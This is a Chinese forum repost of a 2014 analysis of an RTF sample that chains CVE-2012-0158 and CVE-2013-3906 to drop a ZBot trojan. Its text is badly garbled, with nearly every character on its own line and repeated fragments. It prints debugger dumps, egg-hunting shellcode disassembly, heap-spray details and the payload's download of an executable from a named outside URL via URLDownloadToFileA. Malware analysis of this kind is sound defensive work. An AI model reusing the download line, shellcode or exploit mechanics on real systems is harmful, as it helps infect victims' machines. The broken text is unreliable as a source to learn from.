论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
漏洞
[7962] 2014-04-16_Office”组合”式漏洞攻击样本分析
文档创建者:
s7ckTeam
浏览次数:
8
最后更新:
2025-01-17
漏洞
8 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-54
6万
主题
-6万
回帖
-54
积分
管理员
积分
-54
发消息
2014-04-16_Office”组合”式漏洞攻击样本分析
O
f
f
i
c
e
”
组
合
”
式
漏
洞
攻
击
样
本
分
析
瀚
海
源
安
全
F
r
e
e
B
u
f
2
0
1
4
-
0
4
-
1
6
b
y
h
c
l
,
n
i
n
e
8
o
f
c
o
d
e
a
u
d
i
t
l
a
b
s
o
f
v
u
l
n
h
u
n
t
.
c
o
m
1
概
述
概
述
网
上
公
开
一
个
疑
似
网
上
公
开
一
个
疑
似
C
V
E
-
2
0
1
4
-
1
7
6
1
的
的
R
T
F
样
本
,
翰
海
源
分
析
发
现
该
样
本
并
非
样
本
,
翰
海
源
分
析
发
现
该
样
本
并
非
C
V
E
-
2
0
1
4
-
1
7
6
1
,
而
是
在
一
个
,
而
是
在
一
个
R
T
F
样
本
中
同
时
包
括
了
两
个
漏
洞
,
分
别
为
样
本
中
同
时
包
括
了
两
个
漏
洞
,
分
别
为
C
V
E
-
2
0
1
2
-
0
1
5
8
和
和
C
V
E
-
2
0
1
3
-
3
9
0
6
,
,
比
较
特
殊
。
比
较
特
殊
。
昨
日
,
m
a
c
f
e
e
在
其
B
l
o
g
上
也
公
布
了
一
篇
一
个
R
T
F
样
本
包
含
C
V
E
-
2
0
1
0
-
3
3
3
3
和
C
V
E
-
2
0
1
3
-
3
9
0
6
两
个
漏
洞
的
文
章
。
两
个
样
本
比
较
相
似
。
2
样
本
分
析
样
本
分
析
2
.
1
漏
洞
漏
洞
C
V
E
-
2
0
1
2
-
0
1
5
8
1
)
如
果
没
有
安
装
0
1
5
8
的
补
丁
,
在
堆
喷
射
后
,
会
首
先
触
发
0
1
5
8
漏
洞
,
拷
贝
0
x
F
0
0
字
节
栈
溢
出
后
,
通
过
覆
盖
返
回
地
址
实
现
利
用
e
a
x
=
0
0
1
2
1
7
0
0
e
b
x
=
0
b
7
a
0
0
e
0
e
c
x
=
7
c
9
3
0
0
3
d
e
d
x
=
0
e
f
1
0
0
2
0
e
s
i
=
0
8
e
c
e
6
b
c
e
d
i
=
0
0
0
0
0
0
0
0
e
i
p
=
2
7
5
a
2
7
3
8
e
s
p
=
0
0
1
2
1
6
d
c
e
b
p
=
0
0
1
2
1
7
0
8
i
o
p
l
=
0
n
v
u
p
e
i
p
l
n
z
a
c
p
o
n
c
c
s
=
0
0
1
b
s
s
=
0
0
2
3
d
s
=
0
0
2
3
e
s
=
0
0
2
3
f
s
=
0
0
3
b
g
s
=
0
0
0
0
e
f
l
=
0
0
0
0
0
2
1
2
M
S
C
O
M
C
T
L
!
D
l
l
G
e
t
C
l
a
s
s
O
b
j
e
c
t
+
0
x
b
4
5
1
:
2
7
5
a
2
7
3
8
e
8
6
3
f
d
f
f
f
f
c
a
l
l
M
S
C
O
M
C
T
L
!
D
l
l
G
e
t
C
l
a
s
s
O
b
j
e
c
t
+
0
x
b
1
b
9
(
2
7
5
a
2
4
a
0
)
0
:
0
0
0
>
d
d
e
s
p
0
0
1
2
1
6
d
c
0
0
1
2
1
7
0
0
0
b
7
a
0
0
e
0
0
0
0
0
0
f
0
0
0
0
0
0
0
0
0
0
0
0
1
2
1
6
e
c
0
8
e
c
e
6
b
c
0
b
7
a
0
0
e
0
6
a
6
2
6
f
4
3
0
0
0
0
0
0
6
4
0
:
0
0
0
>
k
b
C
h
i
l
d
E
B
P
R
e
t
A
d
d
r
A
r
g
s
t
o
C
h
i
l
d
W
A
R
N
I
N
G
:
S
t
a
c
k
u
n
w
i
n
d
i
n
f
o
r
m
a
t
i
o
n
n
o
t
a
v
a
i
l
a
b
l
e
.
F
o
l
l
o
w
i
n
g
f
r
a
m
e
s
m
a
y
b
e
w
r
o
n
g
.
0
0
1
2
1
7
0
8
2
7
5
e
7
2
7
b
0
8
e
c
e
6
b
c
0
b
7
a
0
0
e
0
0
0
0
0
0
0
0
0
M
S
C
O
M
C
T
L
!
D
l
l
G
e
t
C
l
a
s
s
O
b
j
e
c
t
+
0
x
b
4
5
1
0
0
1
2
1
7
3
0
2
7
5
e
7
5
c
2
0
8
e
c
e
6
b
c
0
b
7
a
0
0
e
0
0
b
7
a
0
0
e
0
M
S
C
O
M
C
T
L
!
D
L
L
G
e
t
D
o
c
u
m
e
n
t
a
t
i
o
n
+
0
x
c
f
1
0
:
0
0
0
>
p
e
a
x
=
0
0
0
0
0
0
0
0
e
b
x
=
0
b
7
a
0
0
e
0
e
c
x
=
7
c
9
3
0
0
3
d
e
d
x
=
0
0
1
4
0
6
0
8
e
s
i
=
0
8
e
c
e
6
b
c
e
d
i
=
0
0
0
0
0
0
0
0
e
i
p
=
2
7
5
a
2
7
3
d
e
s
p
=
0
0
1
2
1
6
d
c
e
b
p
=
0
0
1
2
1
7
0
8
i
o
p
l
=
0
n
v
u
p
e
i
p
l
z
r
n
a
p
e
n
c
c
s
=
0
0
1
b
s
s
=
0
0
2
3
d
s
=
0
0
2
3
e
s
=
0
0
2
3
f
s
=
0
0
3
b
g
s
=
0
0
0
0
e
f
l
=
0
0
0
0
0
2
4
6
M
S
C
O
M
C
T
L
!
D
l
l
G
e
t
C
l
a
s
s
O
b
j
e
c
t
+
0
x
b
4
5
6
:
2
7
5
a
2
7
3
d
8
b
f
0
m
o
v
e
s
i
,
e
a
x
0
:
0
0
0
>
k
b
C
h
i
l
d
E
B
P
R
e
t
A
d
d
r
A
r
g
s
t
o
C
h
i
l
d
W
A
R
N
I
N
G
:
S
t
a
c
k
u
n
w
i
n
d
i
n
f
o
r
m
a
t
i
o
n
n
o
t
a
v
a
i
l
a
b
l
e
.
F
o
l
l
o
w
i
n
g
f
r
a
m
e
s
m
a
y
b
e
w
r
o
n
g
.
0
0
1
2
1
7
0
8
2
7
6
0
6
e
f
e
4
a
4
5
4
2
4
7
4
2
4
7
4
6
4
2
2
7
5
f
4
a
6
2
M
S
C
O
M
C
T
L
!
D
l
l
G
e
t
C
l
a
s
s
O
b
j
e
c
t
+
0
x
b
4
5
6
0
0
1
2
1
7
5
4
2
7
5
e
0
d
6
9
0
0
0
4
0
1
1
0
0
0
0
1
0
0
0
0
0
0
0
1
0
0
0
0
M
S
C
O
M
C
T
L
!
D
l
l
U
n
r
e
g
i
s
t
e
r
S
e
r
v
e
r
+
0
x
6
e
c
6
2
)
S
h
e
l
l
c
o
d
e
不
存
在
R
O
P
,
漏
洞
触
发
成
功
后
,
j
m
p
e
s
p
跳
转
到
栈
上
的
E
g
g
H
u
n
t
i
n
g
的
前
半
段
S
h
e
l
l
c
o
d
e
,
通
过
内
存
遍
历
搜
寻
F
l
a
g
为
的
0
×
7
8
7
8
4
7
4
7
、
0
×
7
8
7
8
4
7
4
7
、
0
x
E
3
E
3
A
C
A
C
的
E
g
g
H
u
n
t
i
n
g
的
后
半
段
S
h
e
l
l
c
o
d
e
。
3
)
0
1
5
8
对
应
的
样
本
o
b
j
e
c
t
如
下
2
.
2
漏
洞
漏
洞
C
V
E
-
2
0
1
3
-
3
9
0
6
1
)
如
果
安
装
了
C
V
E
-
2
0
1
2
-
0
1
5
8
的
补
丁
,
那
么
在
堆
喷
射
之
后
,
T
I
F
的
S
t
r
i
p
B
y
C
o
u
n
t
s
的
第
9
个
v
a
l
u
e
为
0
x
F
F
F
F
0
0
B
2
,
导
致
与
其
他
v
a
l
u
e
累
加
之
后
整
数
溢
出
,
导
致
了
堆
溢
出
,
覆
盖
v
t
a
b
l
e
,
直
接
c
a
l
l
到
0
a
0
a
0
a
0
a
的
堆
喷
射
区
域
,
执
行
s
h
e
l
l
c
o
d
e
。
2
)
通
过
A
c
t
i
v
e
X
1
2
.
b
i
n
堆
喷
射
的
S
h
e
l
l
c
o
d
e
与
0
1
5
8
的
基
本
一
样
,
解
密
后
内
存
搜
寻
相
同
的
F
l
a
g
,
寻
找
E
g
g
H
u
n
t
i
n
g
的
s
h
e
l
l
c
o
d
e
的
后
半
段
3
)
喷
射
的
s
h
e
l
l
c
o
d
e
如
下
:
0
a
0
a
0
a
0
e
e
b
c
0
j
m
p
0
a
0
a
0
9
d
0
0
a
0
a
0
a
1
0
0
a
0
a
o
r
c
l
,
b
y
t
e
p
t
r
[
e
d
x
]
0
a
0
a
0
a
1
2
0
a
0
a
o
r
c
l
,
b
y
t
e
p
t
r
[
e
d
x
]
0
:
0
0
0
>
u
0
a
0
a
0
9
d
0
0
a
0
a
0
9
d
0
4
3
i
n
c
e
b
x
0
a
0
a
0
9
d
1
4
3
i
n
c
e
b
x
0
a
0
a
0
9
d
2
4
3
i
n
c
e
b
x
0
a
0
a
0
9
d
3
4
3
i
n
c
e
b
x
0
a
0
a
0
9
d
4
4
3
i
n
c
e
b
x
0
a
0
f
f
a
d
4
3
1
d
b
x
o
r
e
b
x
,
e
b
x
0
a
0
f
f
a
d
6
6
6
8
1
c
b
f
f
0
f
o
r
b
x
,
0
F
F
F
h
0
a
0
f
f
a
d
b
4
3
i
n
c
e
b
x
0
a
0
f
f
a
d
c
6
a
0
8
p
u
s
h
8
0
a
0
f
f
a
d
e
5
3
p
u
s
h
e
b
x
0
a
0
f
f
a
d
f
8
b
4
4
2
4
0
8
m
o
v
e
a
x
,
d
w
o
r
d
p
t
r
[
e
s
p
+
8
]
0
a
0
f
f
a
e
3
f
f
d
0
c
a
l
l
e
a
x
0
a
0
f
f
a
e
5
8
5
c
0
t
e
s
t
e
a
x
,
e
a
x
0
a
0
f
f
a
e
7
7
5
e
d
j
n
e
0
a
0
f
f
a
d
6
0
a
0
f
f
a
e
9
b
8
4
7
4
7
7
8
7
8
m
o
v
e
a
x
,
7
8
7
8
4
7
4
7
h
0
a
0
f
f
a
e
e
8
9
d
f
m
o
v
e
d
i
,
e
b
x
0
a
0
f
f
a
f
0
a
f
s
c
a
s
d
w
o
r
d
p
t
r
e
s
:
[
e
d
i
]
0
a
0
f
f
a
f
1
7
5
e
8
j
n
e
0
a
0
f
f
a
d
b
0
a
0
f
f
a
f
3
a
f
s
c
a
s
d
w
o
r
d
p
t
r
e
s
:
[
e
d
i
]
0
a
0
f
f
a
f
4
7
5
e
5
j
n
e
0
a
0
f
f
a
d
b
0
a
0
f
f
a
f
6
8
1
3
f
a
c
a
c
e
3
e
3
c
m
p
d
w
o
r
d
p
t
r
[
e
d
i
]
,
0
E
3
E
3
A
C
A
C
h
4
)
样
本
中
对
应
的
压
缩
流
及
T
I
F
如
下
:
2
.
3
E
g
g
H
u
n
t
i
n
g
S
h
e
l
l
c
o
d
e
1
)
通
过
U
R
L
D
o
w
n
l
o
a
d
T
o
F
i
l
e
A
从
h
t
t
p
:
/
/
a
l
i
e
n
s
t
u
b
.
c
o
m
/
t
i
c
k
e
t
/
c
o
k
e
.
e
x
e
下
载
Z
B
o
t
木
马
到
如
下
路
径
:
C
:
D
O
C
U
M
E
~
1
当
前
用
户
L
O
C
A
L
S
~
1
T
e
m
p
.
.
A
p
p
l
i
c
a
t
i
o
n
D
a
t
a
M
i
c
r
o
s
o
f
t
W
i
n
d
o
w
s
s
p
o
o
l
s
v
.
e
x
e
2
)
同
时
会
清
除
注
册
表
的
如
下
键
值
,
以
防
止
用
户
在
此
运
行
后
出
现
文
档
错
误
恢
复
或
安
全
模
式
运
行
等
。
S
o
f
t
w
a
r
e
M
i
c
r
o
s
o
f
t
O
f
f
i
c
e
[
V
e
r
s
i
o
n
]
W
o
r
d
R
e
s
i
l
i
e
n
c
y
D
i
s
a
b
l
e
d
I
t
e
m
s
S
o
f
t
w
a
r
e
M
i
c
r
o
s
o
f
t
O
f
f
i
c
e
[
V
e
r
s
i
o
n
]
W
o
r
d
R
e
s
i
l
i
e
n
c
y
S
t
a
r
t
u
p
I
t
e
m
s
.
3
)
搜
寻
标
记
为
0
×
7
8
7
8
4
7
4
7
、
0
×
7
8
7
8
4
7
4
7
、
0
x
E
3
E
3
A
C
A
C
,
对
应
样
本
O
b
j
e
c
t
为
:
3
.
恶
意
程
序
恶
意
程
序
下
载
执
行
的
恶
意
程
序
为
Z
B
o
t
木
马
,
可
以
访
问
我
们
翰
海
源
的
B
超
系
统
,
来
查
看
该
木
马
的
详
细
行
为
细
节
:
h
t
t
p
s
:
/
/
b
-
c
h
a
o
.
c
o
m
/
i
n
d
e
x
.
p
h
p
/
I
n
d
e
x
/
s
h
o
w
_
d
e
t
a
i
l
/
S
h
a
1
/
C
0
9
D
8
E
C
5
2
9
7
7
3
C
B
E
4
C
5
E
3
5
1
D
C
0
A
B
D
4
7
2
4
E
2
D
C
F
3
C
4
.
参
考
参
考
h
t
t
p
:
/
/
b
l
o
g
s
.
m
c
a
f
e
e
.
c
o
m
/
m
c
a
f
e
e
-
l
a
b
s
/
r
t
f
-
a
t
t
a
c
k
-
t
a
k
e
s
-
a
d
v
a
n
t
a
g
e
-
o
f
-
m
u
l
t
i
p
l
e
-
e
x
p
l
o
i
t
s
h
t
t
p
:
/
/
b
l
o
g
.
v
u
l
n
h
u
n
t
.
c
o
m
/
i
n
d
e
x
.
p
h
p
/
2
0
1
4
/
0
4
/
0
4
/
o
f
f
i
c
e
%
E
7
%
B
B
%
8
4
%
E
5
%
9
0
%
8
8
%
E
5
%
B
C
%
8
F
%
E
6
%
B
C
%
8
F
%
E
6
%
B
4
%
9
E
%
E
6
%
9
4
%
B
B
%
E
5
%
8
7
%
B
B
%
E
6
%
A
0
%
B
7
%
E
6
%
9
C
%
A
C
%
E
5
%
8
8
%
8
6
%
E
6
%
9
E
%
9
0
/
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
漏洞